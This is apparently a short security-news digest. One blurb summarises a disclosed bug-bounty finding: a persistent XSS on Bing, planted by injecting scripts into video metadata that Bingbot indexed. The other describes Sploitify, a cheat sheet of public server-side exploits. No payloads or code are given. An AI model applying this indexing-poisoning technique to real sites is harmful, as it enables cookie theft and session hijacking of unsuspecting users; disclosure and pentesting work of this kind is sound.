Persistent XSS on Microsoft Bing.com by poisoning Bingbot indexing - The author discovered a persistent XSS vulnerability on Microsoft Bing's video indexing system by injecting malicious scripts into video metadata indexed by Bingbot. This vulnerability could lead to various attacks, such as cookie theft, session hijacking, and phishing, affecting all users who view the infected content. The author reported the vulnerability to Microsoft through their security program, received a $3000 bounty, and published a blog post detailing the issue and the steps taken to address it.
Sploitify - This project is an interactive cheat sheet containing a curated list of public server-side exploits. Its goal is to help find exploits for offensive security purposes, such as bug bounty programs or penetration testing.